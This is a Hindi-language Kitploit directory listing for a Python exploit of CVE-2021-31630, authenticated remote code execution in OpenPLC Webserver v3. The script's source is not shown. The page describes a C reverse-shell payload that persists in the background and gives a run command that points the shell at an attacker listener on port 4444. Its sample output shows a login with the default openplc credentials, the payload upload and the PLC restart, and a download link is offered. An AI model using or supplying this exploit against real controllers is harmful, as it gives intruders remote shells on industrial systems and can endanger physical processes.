Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2021-31630 — Open PLC Webserver v3 में कमांड इंजेक्शन का शोषण करने के लिए पायथन स्क्रिप्ट | Kitploit
उपकरण/GitHubGitHub/thewhiteh4t/cve-2021-31630
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubthewhiteh4t/cve-2021-31630

cve-2021-31630

Open PLC Webserver v3 में कमांड इंजेक्शन का शोषण करने के लिए पायथन स्क्रिप्ट

रिपॉजिटरी देखें
21432 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

cve-2021-31630

OpenPLC WebServer v3 - प्रमाणित RCE

यह PoC स्क्रिप्ट Fellipe Oliveira द्वारा प्रदान किए गए शोषण पर आधारित है।

विशेषताएँ :

  • C कोड को सीधे /hardware पर अपलोड करता है, st फ़ाइल अपलोड के बजाय
  • रिवर्स शेल अपलोड करने से पहले डिफ़ॉल्ट प्रोग्राम को पुनर्स्थापित करता है
  • बेहतर C आधारित रिवर्स शेल जो नॉन-ब्लॉकिंग है, जिससे वेब सर्वर हैंग नहीं होता ;)
  • शेल को पृष्ठभूमि में चलाता है, PLC बंद होने के बाद भी बाहर निकलने तक काम करता है
  • सफाई
root@kitploit:~
$ python cve_2021_31630.py -lh 10.10.16.68 -lp 4444 http://10.10.11.7:8080

------------------------------------------------
--- CVE-2021-31630 -----------------------------
--- OpenPLC WebServer v3 - Authenticated RCE ---
------------------------------------------------

[>] Found By : Fellipe Oliveira
[>] PoC By   : thewhiteh4t [ https://twitter.com/thewhiteh4t ]

[>] Target   : http://10.10.11.7:8080
[>] Username : openplc
[>] Password : openplc
[>] Timeout  : 20 secs
[>] LHOST    : 10.10.16.68
[>] LPORT    : 4444

[!] Checking status...
[+] Service is Online!
[!] Logging in...
[+] Logged in!
[!] Restoring default program...
[+] PLC Stopped!
[+] Cleanup successful!
[!] Uploading payload...
[+] Payload uploaded!
[+] Waiting for 5 seconds...
[+] Compilation successful!
[!] Starting PLC...
[+] PLC Started! Check listener...
[!] Cleaning up...
[+] PLC Stopped!
[+] Cleanup successful!

निर्भरताएँ

root@kitploit:~
pip3 install requests

उपयोग

root@kitploit:~
usage: cve_2021_31630.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url

positional arguments:
  url         Target URL with http(s)://

options:
  -h, --help  show this help message and exit
  -u U        Username
  -p P        Password
  -t T        Request Timeout, increase if server is slow
  -lh LH      LHOST
  -lp LP      LPORT
टूल डाउनलोड करें